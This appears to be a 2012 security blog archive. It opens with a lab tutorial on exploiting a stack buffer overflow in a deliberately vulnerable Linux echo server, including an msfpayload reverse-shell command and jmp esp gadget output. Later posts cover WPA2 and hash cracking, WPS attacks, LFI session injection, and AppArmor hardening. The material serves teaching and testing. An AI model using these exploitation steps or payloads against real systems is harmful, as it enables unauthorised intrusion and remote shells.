Friday, December 28, 2012

EXPLOIT-DEV : Simple Buffer Overflow exploit writing on Linux

I am going to do a simple buffer overflow on 32-bit Linux. The target application is vuln-server, which you can download here.



Why this software? Because this echo server behaves differently from a normal echo server: it echoes the message back in reverse order.

Does it matter? Yes, it matters when you are developing the exploit: the shellcode has to be reversed, while the return address must not be. This is quite different from normal exploit writing.

I developed this exploit on BackTrack 5r3 (32-bit). Compile the echo server with gcc using the following switches, which disable the stack protection.

gcc vuln-server.c -o vuln-server -static -fno-stack-protector -z norelro -ggdb

Run the vuln-server :

./vuln-server 5700

Open another terminal to run the client :

nc -vv 127.0.0.1 5700
Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit

Enter something on the client, for example :

Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit
hello world
dlrow olleh

You will see that the message you entered is echoed back in reverse order.

The server side will display :

127.0.0.1:41959 hello world

Now write a Python script that sends 500 bytes of data to the echo server.



Run it and you will see that the EIP register is overwritten with A's.

Next, create a 500-byte unique pattern to overwrite EIP.

./pattern_create.rb 500

Copy the result into the Python script above, replacing the junk with the pattern.

Run the modified Python script again and you will see that EIP is overwritten with 0x416c3341.

Reverse the byte order of the address and find the offset with the following command :

./pattern_offset.rb 0x41336c41 500
[*] Exact match at offset 339

So, the offset is 339.

Now create the shellcode with msfpayload and encode it with the alpha_upper encoder to avoid the bad characters.

msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -e x86/alpha_upper

We then need to reverse the shellcode with the following Python script.

shellcode = "blah blah ...."          # paste the raw msfencode output here
shellcode = shellcode[::-1]           # reverse the bytes, because the server reverses its input
shellcode = shellcode.encode("hex")   # Python 2: hex-encode the reversed bytes (keep the result)
print shellcode

Then put "\x" back in front of every two hex characters of the output.

Now it is time to find the return address.

msfelfscan -j esp vuln-server
[vuln-server]
0x08064e49 push esp; ret
0x08064ea7 push esp; ret
0x08065f71 push esp; ret
0x08081949 push esp; ret
0x08085df9 push esp; retn 0x8934
0x080a56e9 push esp; ret
0x080c37ab jmp esp
0x080c388f jmp esp
0x080c38b7 jmp esp
0x080c3c3f jmp esp
0x080c3d17 jmp esp
0x080c3da7 jmp esp
0x080c3db3 jmp esp
0x080c3dd3 jmp esp
0x080c532b jmp esp <----- selected this one

I select the last one as the return address.

As I mentioned, this echo server behaves differently from others: the exploit buffer is processed backward rather than forward. The final exploit Python script looks like this :



Now start a listener on port 4444, run the echo server, then run the exploit Python script. We got the shell.



Therefore, never run any program as root.
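The gcc line at the start of this post switches off the stack protector (-fno-stack-protector) and RELRO (-z norelro), and the static link leaves the rest to the kernel's NX handling. Before trusting any binary you run, it is worth checking which of those protections are actually present. The following shell functions are an added example, not code from the post or from vuln-server: they read `readelf -l` and `nm` output (from a live file via `check_binary`, or from captured text on stdin), so they can be tried without a real binary.

```shell
#!/bin/sh
# Added example (not from the original post): report which of the protections
# that the gcc line above turns off are present in a binary. The checks read
# `readelf -l` and `nm` output on stdin, so they work on captured text too.

# stack_is_nx: reads `readelf -l` output on stdin; succeeds when a GNU_STACK
# segment is present and is not marked executable (no "E" in the flags).
stack_is_nx() {
    grep -E '^[[:space:]]*GNU_STACK' | grep -qvE 'RWE'
}

# has_relro: reads `readelf -l` output on stdin; succeeds when a GNU_RELRO
# segment exists. `-z norelro` in the compile line removes it.
has_relro() {
    grep -qE '^[[:space:]]*GNU_RELRO'
}

# has_canary_ref: reads `nm` (or `objdump -d`) output on stdin; succeeds when
# __stack_chk_fail is referenced. `-fno-stack-protector` removes the calls the
# compiler would otherwise insert. Caveat: in a -static binary the symbol can
# be present because libc itself uses it, so for static builds look at the
# disassembly of your own functions for calls to __stack_chk_fail instead.
has_canary_ref() {
    grep -q '__stack_chk_fail'
}

# check_binary FILE: run all three checks on a real ELF file (needs binutils).
check_binary() {
    bin=$1
    if readelf -l "$bin" | stack_is_nx; then echo "NX stack:        yes"; else echo "NX stack:        NO"; fi
    if readelf -l "$bin" | has_relro; then echo "RELRO:           yes"; else echo "RELRO:           NO"; fi
    if nm "$bin" 2>/dev/null | has_canary_ref; then echo "stack protector: yes"; else echo "stack protector: NO"; fi
}

# Usage: check_binary ./vuln-server
```

Run `check_binary` against the vuln-server built with the flags above and each line should say NO; rebuild without `-fno-stack-protector -z norelro` and the RELRO and stack protector lines flip to yes, which is the state a production service should be in.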

That's all! See you.

Tuesday, December 18, 2012

Great talks about Security products and how they suck

The following talks are presented by Joe McCray. He shows how to bypass the (sometimes very expensive) security products that claim to protect your network and systems from attack.

He also urges managers to budget for security staff and security training rather than just purchasing security products.

Bio :

Joe McCray - Advanced Security Lead Instructor

Joseph McCray is the lead / head instructor for Advanced Security by Academy of Computer Education. Joe oversees the quality of instruction of all of our hacking and forensics courses and makes sure that our entire team of instructors has what they need and is prepared to the fullest for each and every class. Joe has been leading Advanced Security's hacking and forensics training classes since 2004.

Joe McCray is a retired Air Force Veteran and has been in security for over 15 years. Joe has been involved in over 150 very high level pentesting assessments and has some major hacking accomplishments that he can share with his classes. His extensive experience and deep knowledge, mixed with his comedic style has led Joe to be one of the most highly sought after speaking experts in the industry. Joe makes speaking appearances and gives seminars at major events in the security community such as Black Hat, DefCon, BruCon, Hacker Halted and more. Joe is the recipient of the 2009 EC-Council Instructor Circle of Excellence Award and the 2010 EC-Council Instructor of the Year Award. Joe also runs a successful international security training website called Strategic Security.


Please watch them with an open mind. Here we go :

Hacktivity 2012 - Big Bang Theory : The Evolution of Pentesting High Security Environments





Defcon 18 - You Spent All That Money and You Still Got Owned???





You Spent All That Money and You Still Got Owned????




That's all! See you.

Friday, December 14, 2012

HOWTO : Setup My Back|Track 5r3 Personal Supercomputer

My Hardware

CPU : Intel i7-3930K (6 cores, 12 threads with Hyper-Threading, Socket 2011)
Motherboard : ASUS SaberTooth X79
RAM : Corsair Vengeance DDR3 1600 32GB (4GB x 8)
Display Card : Inno3D nVidia GeForce GTX 590 384bit 3072MB DDR5 x 2
Hard Drive : WD SATA III 3TB
Power Supply : Seasonic X-series 1250W
Cooling : Water cooling system with EK products
Case : Lian Li PC-z70 (modified)

My Operating System

Back|Track 5r3 64-bit as the host operating system on the hardware above.

My Problem

When Back|Track 5r3 boots and "startx" is run, the monitor goes black. This is because of the nVidia display cards in the system.

The only way to solve it is to press "Tab" in the boot option menu when booting Back|Track 5r3 and append the following to the end of "text splash vga=791" :

text splash vga=791 nomodeset

After that, Back|Track 5r3 will start the desktop when you enter "startx". Install the system to your hard drive as usual.

After the installation completes, do not reboot. Instead, mount the hard drive partitions and edit the following file.

nano /etc/default/grub

Locate 'GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791"' and append the following :

text splash vga=791 nomodeset

so that it looks like this :

GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791 nomodeset"

Then execute the following commands :

update-grub
fix-splash

Reboot the system.

My nVidia and CUDA drivers

Install the current nVidia driver from the Back|Track repositories :

apt-get update
apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

After the nVidia driver is installed, execute the following command :

nvidia-xconfig

Now install the CUDA driver. Go to the CUDA Developer site and download it, making sure you select the Ubuntu 10.04 version.

64-bit version :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel-update-1/installers/cuda_5.0.35_linux_64_ubuntu10.04-1.run

32-bit version :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel-update-1/installers/cuda_5.0.35_linux_32_ubuntu10.04-1.run

After the download, make it executable.

For example :

chmod +x cuda_5.0.35_linux_64_ubuntu10.04-1.run

Then install it and follow the on-screen instructions. Accept the default settings.

./cuda_5.0.35_linux_64_ubuntu10.04-1.run

The last step of the installation is to set up the paths of the executables and libraries.

nano /root/.bashrc

Append the following line at the end of the file.

PATH=$PATH:/usr/local/cuda-5.0/bin

nano /etc/ld.so.conf.d/cuda.conf

Add the following lines to the file.

/usr/local/cuda-5.0/lib
/usr/local/cuda-5.0/lib64

Then execute the following command and reboot afterward.

ldconfig
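The GRUB and ld.so.conf edits above are easy to get wrong by hand (a duplicated `nomodeset`, a second GRUB_CMDLINE_LINUX_DEFAULT line, a library directory listed twice). The following shell functions are an added example, not the blog's own scripts: they perform the same edits idempotently on whatever file path they are given, so they can be tried on a copy of /etc/default/grub before touching the real one, and the same kernel-parameter step recurs in the nVidia Optimus and Gigabyte TouchNote posts further down this page.

```shell
#!/bin/sh
# Added example (not from the original post): the GRUB and ld.so.conf edits
# above, done idempotently so they can be re-run safely and tried on a copy of
# each file first. All paths are parameters; nothing here is the blog's code.

# grub_params FILE: print the current GRUB_CMDLINE_LINUX_DEFAULT value.
grub_params() {
    sed -n 's/^GRUB_CMDLINE_LINUX_DEFAULT="\(.*\)"$/\1/p' "$1"
}

# add_grub_params FILE PARAM...: append each PARAM (e.g. nomodeset) to
# GRUB_CMDLINE_LINUX_DEFAULT unless it is already there; add the line if missing.
add_grub_params() {
    grub_file=$1; shift
    for p in "$@"; do
        cur=$(grub_params "$grub_file")
        case " $cur " in
            *" $p "*) continue ;;          # already present, nothing to do
        esac
        if grep -q '^GRUB_CMDLINE_LINUX_DEFAULT=' "$grub_file"; then
            if [ -n "$cur" ]; then new="$cur $p"; else new=$p; fi
            sed -i "s|^GRUB_CMDLINE_LINUX_DEFAULT=\"$cur\"$|GRUB_CMDLINE_LINUX_DEFAULT=\"$new\"|" "$grub_file"
        else
            printf 'GRUB_CMDLINE_LINUX_DEFAULT="%s"\n' "$p" >> "$grub_file"
        fi
    done
}

# add_ld_dirs FILE DIR...: add library directories to an ld.so.conf.d file,
# one per line, skipping any already listed. Run `ldconfig` afterwards.
add_ld_dirs() {
    conf=$1; shift
    [ -f "$conf" ] || : > "$conf"
    for d in "$@"; do
        grep -qxF "$d" "$conf" || printf '%s\n' "$d" >> "$conf"
    done
}

# Usage on the real files (as root, after backing them up):
#   add_grub_params /etc/default/grub nomodeset && update-grub
#   add_ld_dirs /etc/ld.so.conf.d/cuda.conf /usr/local/cuda-5.0/lib /usr/local/cuda-5.0/lib64 && ldconfig
```

For the Optimus case later on the page, call `add_grub_params /etc/default/grub i915.modeset=1 nomodeset`; running it a second time changes nothing.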

My Hash Cracking Power

We use oclHashcat+ to test the cracking performance of this hardware.

cd /pentest/passwords/oclhashcat+
./cudaExample0.sh
./cudaExample400.sh
./cudaExample500.sh

If you see the hashes being cracked, CUDA is set up properly.

My Additional Software

This host is for hash and password cracking. The penetration testing work will be done in virtual machines.

I will install virtualbox, sysinfo, shutter, synaptic, gtk-recordmydesktop and sensors-applet to extend the functions of this host.

By the way, I also need to fix some minor bugs in Back|Track 5r3.

Bug #1 :

There has been no sound since Back|Track 5.

mkdir /root/.config/autostart
nano /root/.config/autostart/pulseaudio.desktop

Add the following lines to the file.

[Desktop Entry]
Type=Application
Exec=/usr/bin/pulseaudio
Hidden=false
NoDisplay=false
X-GNOME-Autostart-enabled=true
Name=Pulseaudio
Comment=Start Pulseaudio

Bug #2 :

Wicd has been unable to connect to D-Bus since Back|Track 5.

dpkg-reconfigure wicd
update-rc.d wicd defaults

That's all! See you.

Tuesday, December 11, 2012

HOWTO : Install edb-debugger on Ubuntu 12.10

When debugging on Windows, we use Immunity Debugger or OllyDbg, which are very good Windows debuggers. On Linux there is a command-line debugger, GDB (the GNU Project Debugger). Is there a GUI debugger for Linux? Yes, there is: Evan's Debugger (edb-debugger).

The current release is 0.9.18, but it does not work properly on Ubuntu 12.04 LTS or 12.10. The available deb package, version 0.9.17, does not work properly on those Ubuntu versions either.

The only solution is to install the svn version (currently 0.9.19). Here is how.

Step 1 :

sudo apt-get update
sudo apt-get install libqt4-dev libboost1.48-all-dev subversion

Step 2 :

svn checkout http://edb-debugger.googlecode.com/svn/trunk/ edb-debugger
cd edb-debugger
qmake
make
sudo make install

Step 3 :

To see where edb is installed :

whereis edb

The following is from a 64-bit system :

/bin/edb /lib64/edb

Go to your home directory, for example /home/samiux, and create the .edb directory.

cd /home/samiux
mkdir .edb

Step 4 :

Run the program :

sudo edb

Once the program launches, a popup says the library files cannot be located. Go to "Directories" in "Preferences" and set the following :

Symbol Directory - /home/samiux/.edb
Plugin Directory - /lib64/edb/
Session Directory - /home/samiux/.edb

That's all! See you.

Saturday, December 01, 2012

Love Your Neighbour as Yourself

Again, this time I am not going to talk about IT or Infosec.

A video is better than a thousand words ....



That's all! See you.

Friday, November 30, 2012

Quit smoking now!

This time I am not going to talk about IT or Infosec. I am going to show you a Thai-made quit-smoking advertisement. If you are a smoker, please take a few minutes to watch it. Maybe you will agree with the video.



That's all! See you.

Friday, November 09, 2012

HOWTO : Make Sure Your Server Is Really Hidden

You have found a way to hide your server from the internet, but you are not 100% sure it worked. With penetration testing tools you can confirm that your hidden server is really hidden.

Here we use the tools in BackTrack 5 r3.

nmap -sS -sV -v -Pn samiux.com

cd /pentest/enumeration/dns/fierce/

perl fierce.pl -dns samiux.com

*** where "samiux.com" is the domain name; it is only an example here.

In the output of the last command, make sure your server's IP address is not listed if it is supposed to be hidden.

Now your server's IP address is not shown. Is your server really hidden? Maybe not. Test further with searchdns.netcraft.com, which keeps historical records. Unfortunately, you may find historical records of your server's IP address there (if any exist).

If your server's IP address is in Netcraft's history records, consider changing the IP address when necessary in order to hide your server from the internet.

That's all! See you.

Tuesday, November 06, 2012

DerbyCon 2012 - Intro to Linux System Hardening

Sadly, this talk is from a system administrator to system administrators rather than for information security (InfoSec) people. The speaker, Chris Jenks (rattis), hardens Linux from a system administrator's point of view instead of an InfoSec view. However, it is an InfoSec conference. Strange.

In general, a system administrator has no knowledge of how malicious hackers think and act. Their InfoSec knowledge is limited; they just guess that what they have done will prevent attacks.

Description of the Talk (Written by the speaker) :

This introductory level talk is designed for people that know a little bit about Linux and how to run Backtrack. The main target audience would have a junior level administration experience, who also knows about Backtrack.

It looks at how to do basic system hardening on CentOS and Ubuntu, using systems with default installs. It then looks at using those same tactics to systems running Backtrack. Along the way, I discuss why I don’t like using virtual machines, multiboot, liveCD or USB to run Backtrack in the field, and why I think it should be run on a dedicated machine.

BIO of Speaker :

Experience includes fifteen years of network engineering and thirteen years system administration. He is currently studying Information Assurance at Eastern Michigan University. That degree will supplement his degrees in Computer Information Systems and Anthropology. Certifications include Security+ and Offensive Security Wireless Professional. Involved in Michigan’s Locksport scene, and a regular at Arbsec and MiSec. He’s the ”rat” in the Rats and Rogues InfoSec Podcast.



My Own Opinion :

Basically, BackTrack Linux is a Linux distribution for penetration testing. That means it is a tool for attackers (think of it this way to keep things clear). It is like Thai boxers, who do not wear any protective equipment during a fight because that equipment would hinder their performance.

However, the speaker advised BackTrack users to enable the firewall (iptables) and configure the Apache web server to listen on localhost (127.0.0.1). He also suggests reconfiguring SSH to disallow root login and creating a sudoer account. He further advises installing tools such as denyhosts, fail2ban, tripwire and logcheck in BackTrack.

If the firewall is enabled and tools such as denyhosts, fail2ban and tripwire are installed in BackTrack, it is like shooting ourselves in the foot when using it for pentesting. Meanwhile, the speaker does not know the function of the Apache web server in BackTrack, as he does not know why it is there. Moreover, SSH in BackTrack is there for attack purposes rather than administration. Almost all the tools in BackTrack require root privileges to run, so a sudoer account is not required.

BackTrack is not a normal Linux distribution for general users to use daily and casually. It is a specially designed distribution for penetration testing; it is designed for attackers (think of a penetration tester as an attacker who is not a bad guy). It is designed for attack, not for defence.

Oddly enough, the speaker has some InfoSec qualifications. Overall, this talk is misleading from a BackTrack user's point of view. Not recommended.

UPDATED on November 10, 2012 :

I found out that he gave two more talks on the same topic, spreading the same wrong information to the listeners. Too sad.

I doubt that the sysadmin would gain anything by hacking back (if he does at all). What can he do? As he said, shut down the attacker's box? The attacker is just using BackTrack, and if the root password has been changed, there is no chance for a sysadmin to do anything evil to the attacker. It is really doubtful, in my opinion.

He does not even know the difference between 127.0.0.1 and 0.0.0.0, as he suggests turning off CUPS because it runs as root. However, CUPS listens on localhost and the user account running it is already root. So what does he want?

By the way, he uses DenyHosts to block unwanted SSH access, which means he does not know how SSH is used to perform an attack.

He also suggests disabling the mail function. However, how then can we (the attacker) perform an attack via mail?

I suspect he does not know how to use BackTrack. Not kidding!

Finally, one thing I do agree with him on is changing the root password to something else, and maybe the hostname too.

Anyway, he is just a system administrator, not an information security person.





Wednesday, October 24, 2012

HOWTO : Activate nVidia GeForce GT650M on 15" MacBook Pro Retina

You are required to install the following packages.

gfxCardStatus switches to the nVidia GT650M automatically when running software that uses 3D acceleration, such as VirtualBox. You can also switch manually.

CUDA is loaded automatically when software uses CUDA features.

That's all! See you.

Tuesday, October 16, 2012

HOWTO : nVidia Optimus on Back|Track 5 r3

(A) Hardware (nVidia Optimus)

Brand : Asus n82jv-vx072v
CPU : Intel i5 450M, 2.4GHz
RAM : 4096MB DDR3 1066
Display card : nVidia GeForce GT335M 1G VRAM DDR3

(B) Hardware (nVidia GeForce)

Any computer with a CUDA-capable nVidia GeForce display card.

Problem

You get a black screen on boot and cannot go any further to install Back|Track. This tutorial applies not only to Back|Track but also to other Linux distributions.

Solution

Step 1 :

When booting, in the "Boot Option Menu", press "Tab" (other Linux distributions differ) and append the following to the end of the kernel option line :

text splash vga=791 i915.modeset=1 nomodeset

*** Remarks : "i915.modeset=1 nomodeset" is for Optimus only. For a plain nVidia GeForce card, only "nomodeset" is needed.

Step 2 :

Once booted up and installed, do not restart yet. Mount the hard drive and edit the following :

nano /etc/default/grub

Locate 'GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791"' and append the following :

text splash vga=791 i915.modeset=1 nomodeset

so that it looks like this :

GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791 i915.modeset=1 nomodeset"

update-grub

The following command is for Back|Track only.

fix-splash

Step 3 :

Reboot your computer.

Step 4 (If you do Step 4a, DO NOT do this step, skip it.) :

Do not run "startx"; this step must be done without X. On other Linux distributions, press "Alt + F2" to switch to console mode.

Download CUDA 5.0 for 64-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_64_ubuntu10.04.run

Download CUDA 5.0 for 32-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_32_ubuntu10.04.run

chmod +x cuda_5.0.35_linux_64_ubuntu10.04.run

or

chmod +x cuda_5.0.35_linux_32_ubuntu10.04.run

Then run the following command.

./cuda_5.0.35_linux_64_ubuntu10.04.run

or

./cuda_5.0.35_linux_32_ubuntu10.04.run

Answer "accept" and install nVidia driver (current version is 304.54) as well as nVidia CUDA Toolkit (current is 5.0.35). If you want to install samples, please do. When asking for the path or directory, please press enter to accept the default setting.

Remarks : Please note that CUDA has an updated version.

Step 4a (do not do this together with Step 4; do only one of them) :

Do not run "startx"; this step must be done without X. On other Linux distributions, press "Alt + F2" to switch to console mode.

add-apt-repository ppa:ubuntu-x-swat/x-updates

Edit : The x-swat PPA no longer works. Use the Back|Track repositories instead; just run the following commands.

apt-get update
apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

Your nVidia driver is now installed (currently version 304.60).

Download CUDA 5.0 for 64-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_64_ubuntu10.04.run

Download CUDA 5.0 for 32-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_32_ubuntu10.04.run

chmod +x cuda_5.0.35_linux_64_ubuntu10.04.run

or

chmod +x cuda_5.0.35_linux_32_ubuntu10.04.run

Then run the following command.

./cuda_5.0.35_linux_64_ubuntu10.04.run

or

./cuda_5.0.35_linux_32_ubuntu10.04.run

Answer "accept" and DO NOT install nVidia driver. Only install nVidia CUDA Toolkit (current is 5.0.35). If you want to install samples, please do. When asking for the path or directory, please press enter to accept the default setting.

Remarks : Please note that CUDA has an updated version.

Step 5 :

The following is for Back|Track only. On other Linux distributions, replace "root" with your username.

nano /root/.bashrc

Append the following :

PATH=$PATH:/usr/local/cuda-5.0/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda-5.0/lib:/usr/local/cuda-5.0/lib64:/lib
export PATH
export LD_LIBRARY_PATH

Alternatively, do the following instead, which works on any Linux distribution.

nano /etc/ld.so.conf.d/cuda.conf

/usr/local/cuda-5.0/bin
/usr/local/cuda-5.0/lib
/usr/local/cuda-5.0/lib64

Save and then run the following command :

ldconfig

Then, reboot.

Step 6 : (For nVidia Optimus only)

To install Bumblebee :

sudo add-apt-repository ppa:bumblebee/stable

sudo apt-get update

sudo apt-get install bumblebee bumblebee-nvidia

Then, reboot the box.

Step 7 : (For nVidia Optimus only)

To test whether the nVidia driver works :

glxspheres

optirun glxspheres

Step 8 : (Optional)

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (version 0.4.0 at the time of writing). Back|Track 5 r3 may have pyrit installed, but without CUDA support.

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
python setup.py install

To test whether the installation is correct (if you are not using Optimus, "optirun" is not required) :

optirun pyrit list_cores
optirun pyrit benchmark
optirun pyrit benchmark_long

Finally, thanks to Malko for testing it and confirming that it works.

That's all! See you.

Saturday, October 13, 2012

HOWTO : Cracking WPA2 Passphrase Made Easy

Many people still think that cracking a WPA2 passphrase requires dictionaries. That is not true.

You can brute-force a WPA2 passphrase with the help of GPUs. Here are my findings from April 16, 2010 and May 22, 2011.



If the wifi router has WPS (Wifi Protected Setup) and it is enabled, cracking it is very easy with the tool reaver.



In addition, it is risky to use public wifi, free or not, whether or not it has a passphrase (please refer to "See Also" for details). Also be aware that there are high-power, long-range wifi adaptors on the market.

Alfa Network produces high-power, long-range wifi adaptors such as the Alfa AWUS036H and Alfa AWUS036NHR, which can connect to a victim's wifi router from 1KM+ away.

That's all! See you.

See Also :

HOWTO : Sniffing SSL with ettercap on Back|Track 5

HOWTO : Protect yourself from ARP spoofing

Wednesday, October 03, 2012

EXPLOIT-DEV : CentOS 6.3 vs Ubuntu 12.04

There are many methods to exploit a Local File Inclusion (LFI) vulnerability in a PHP web application on Linux systems, such as process injection, log file injection and session file injection. Some of them no longer work on the latest Linux distributions, I think.

Unfortunately, in my recent research I found that on CentOS 6.3 (and maybe previous versions) with default settings, PHP session files can be injected and loaded, whereas on Ubuntu 12.04 they cannot. (Remarks : I did not check other Linux distributions in this research.)

When PHP session files can be injected and loaded through an LFI vulnerability, attackers can obtain a remote shell.

Basically, CentOS is a clone of RedHat Enterprise Linux.

Reference : Web vulnerabilities to gain access to the system

That's all! See you.

Sunday, September 30, 2012

HOWTO : Web Application Attack

The following tutorials were created by Prateek Gianchandani, who is interested in penetration testing, web application security and intrusion detection. He is currently a researcher for InfoSec Institute and has previously worked for security startups. In his spare time he maintains his website searching-eye.com.

Burp Suite Walkthrough

Inserting Vulnerabilities in Web Applications

Hacking Web Authentication – Part 1

Hacking Web Authentication – Part 2

W3af walkthrough and tutorial – Part 1

w3af walkthrough and tutorial part 2 – Discovery and Audit plugins

w3af walkthrough and tutorial part 3 – Remaining plugins

w3af walkthrough and tutorial part 4 – w3af tools, profiles and scripting

That's all! See you.

HOWTO : SQLi Lab Series by Audi-1

The following is the SQLi Lab series, created by Audi-1, an Offensive Security Certified Expert (OSCE). He explains how SQLi works.

SQLi Lab Series - Introduction

SQLi Lab Series - Error Based

SQLi Lab Series - Double Query / SubQuery

SQLi Lab Series - Blind Injection - Boolean Based

SQLi Lab Series - Blind Injection - Time Based

SQLi Lab Series - Using Outfile / Dumpfile

SQLi Lab Series - Post Based

SQLi Lab Series - Double Query

SQLi Lab Series - Update Query

SQLi Lab Series - Insert Query / Headers

SQLi Lab Series - Cookie Based

Second Order Injection

Bypassing blacklist filters (Part 1)

Bypassing blacklist filters (Part 2)

The whole video series of the SQLi Lab Series

That's all! See you.

Wednesday, September 26, 2012

Course Review - Cracking the Perimeter (CTP)

Before enrolling in Cracking the Perimeter, you need to solve a challenge that confirms you have the relevant skills. This course is not designed for newbies.

If you have no penetration testing knowledge, I recommend taking Penetration Testing with BackTrack first.

The Course

Windows debuggers are used for most of the course, for anti-virus bypass, backdooring and exploit writing. You should also have some knowledge of x86 assembly, Linux, Windows and web scripting languages such as PHP. You are also required to do a lot of research on exploit writing, and extra exercises to improve your skills are recommended. The course also covers web application attacks.

The module I like most and hate most is HP OpenView Network Node Manager NNM 7.5.0. In the beginning I overlooked this module, thinking it was a very specific case whose solution would not apply to other exploit writing. Later I found it very interesting and spent a lot of time understanding what was going on. Fortunately, in the end I fully understood it.

Mati (the founder of Offensive Security) gave a talk at DefCon 16 about writing this exploit, in which he says he could not solve the problem at first. Here it is :



You should book the exam within 90 days after your lab access expires; otherwise you need to pay for the exam.

The Challenge

The challenge gives you 47 hours and 45 minutes to solve a series of problems, and you must submit the report within 24 hours after it ends.

Finally, the exam was over and the report was submitted. Within 3 business days, I received an email telling me that I passed the challenge. I am now an Offensive Security Certified Expert (OSCE).

The Conclusion

In conclusion, this course teaches exploit writing and some AV bypass and backdooring skills. You need some penetration testing skills before taking it. The course is an eye-opener; you can learn a lot during it. Make sure you fully understand the course materials. Recommended!

Tuesday, September 04, 2012

HOWTO : Apparmor for VirtualBox on Ubuntu 12.04

AppArmor is an application confinement system, a kind of application firewall, similar to SELinux. It is installed by default on Ubuntu.

There is no AppArmor profile for VirtualBox in /etc/apparmor.d/, so you have to build your own. You can copy the following profile into that directory and enable it.

Step 1 :

sudo apt-get install apparmor-utils

Make sure Virtualbox is installed.

Step 2 :

usr.bin.VBox



Copy the profile above into /etc/apparmor.d/ and name it with the underlined name.

Step 3 :

sudo aa-enforce /etc/apparmor.d/usr.bin.VBox

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

HOWTO : Apparmor for xChat on Ubuntu 12.04

AppArmor is an application confinement system, a kind of application firewall, similar to SELinux. It is installed by default on Ubuntu.

There is no AppArmor profile for xChat in /etc/apparmor.d/, so you have to build your own. You can copy the following profile into that directory and enable it.

Step 1 :

sudo apt-get install apparmor-utils
sudo apt-get install xchat

Step 2 :

usr.bin.xchat



Make sure lines #19, #34 and #36 match the installed Python version. If you upgrade Python to another version, change them accordingly; otherwise xChat will not run, as AppArmor blocks it.

Copy the profile above into /etc/apparmor.d/ and name it "usr.bin.xchat".

Step 3 :

After making any changes, enable it :

sudo aa-enforce /etc/apparmor.d/usr.bin.xchat
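When xChat fails to start after the profile is enforced, the quickest way to see which path the profile got wrong is to read the kernel's AppArmor denial messages rather than guess. The shell functions below are an added example, not part of the post or of the xChat profile: they summarise `apparmor="DENIED"` lines from a kernel log, list the pythonX.Y versions a profile refers to, and rewrite them after a Python upgrade. The log line and the profile in the test are constructed samples in the usual audit format.

```shell
#!/bin/sh
# Added example (not from the original post): after enabling a profile, find
# out what AppArmor is blocking instead of guessing. Reads kernel log lines
# (dmesg / /var/log/kern.log) and summarises each DENIED event; also lists and
# retargets the pythonX.Y paths the post says must match the installed
# interpreter. Log lines and profiles used with it are assumed to be in the
# standard audit / profile format; nothing here is the blog's own code.

# apparmor_denials LOGFILE: one line per denial: profile operation path mask
apparmor_denials() {
    grep 'apparmor="DENIED"' "$1" |
    sed -n 's/.*operation="\([^"]*\)".*profile="\([^"]*\)".*name="\([^"]*\)".*denied_mask="\([^"]*\)".*/\2 \1 \3 \4/p'
}

# profile_python_versions PROFILE: distinct pythonX.Y versions referenced
profile_python_versions() {
    grep -o 'python[0-9]\.[0-9][0-9]*' "$1" | sort -u
}

# retarget_python PROFILE OLD NEW: rewrite e.g. python2.7 -> python2.6 paths
# in place; reload the profile afterwards so the change takes effect.
retarget_python() {
    old=$(printf '%s' "$2" | sed 's/\./\\./g')   # escape the dot for sed
    sed -i "s|$old|$3|g" "$1"
}

# Usage (as root, after aa-enforce):
#   apparmor_denials /var/log/kern.log
#   profile_python_versions /etc/apparmor.d/usr.bin.xchat
#   retarget_python /etc/apparmor.d/usr.bin.xchat python2.7 python2.6 \
#       && apparmor_parser -r /etc/apparmor.d/usr.bin.xchat
```

A denial line such as `/usr/bin/xchat open /usr/lib/python2.7/os.py r` tells you exactly which rule is missing; compare the path against `profile_python_versions` before editing, since a version mismatch is the cause the post warns about.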

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

HOWTO : Apparmor for Firefox on Ubuntu 12.04

AppArmor is an application confinement system, a kind of application firewall, similar to SELinux. It is installed by default on Ubuntu.

The AppArmor profile for Firefox is already installed in /etc/apparmor.d/ but is not enabled by default.

Step 1 :

sudo apt-get install apparmor-utils

Step 2 :



Make sure lines #120 to #127 match the language installed on your Ubuntu. Lines #122 to #123 and #126 to #127 show the Traditional Chinese names of the Public and Downloads directories.

Step 3 :

After making any changes, enable it :

sudo aa-enforce /etc/apparmor.d/usr.bin.firefox

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

Wednesday, August 22, 2012

EXPLOIT-DEV : Quick TFTP Server Pro 2.1 Case Study

Quick TFTP Server Pro is a multi-threaded TFTP and telnet server for Microsoft Windows. It is designed to let network administrators and users save and write files from various network equipment, and to let users log in to the server to execute commands such as listing file and directory information and reverse-pinging network equipment.

The current version, 2.1, is vulnerable to a buffer overflow announced on March 26, 2008 and a directory traversal vulnerability announced on November 5, 2011.

I focus only on the buffer overflow. The software has not fixed the problem since the vulnerability was discovered in 2008, and I wondered why.

So I decided to investigate. The enquiry confirmed that the software is only exploitable on Windows XP SP2 and below; on Windows XP SP3 and later it cannot be exploited even though it is vulnerable. Why?

I found that the software ships with no DLL files; it is a standalone executable. After Windows XP SP3, Microsoft implemented Data Execution Prevention (DEP), which enforces non-executable stack pages and prevents the execution of arbitrary shellcode.

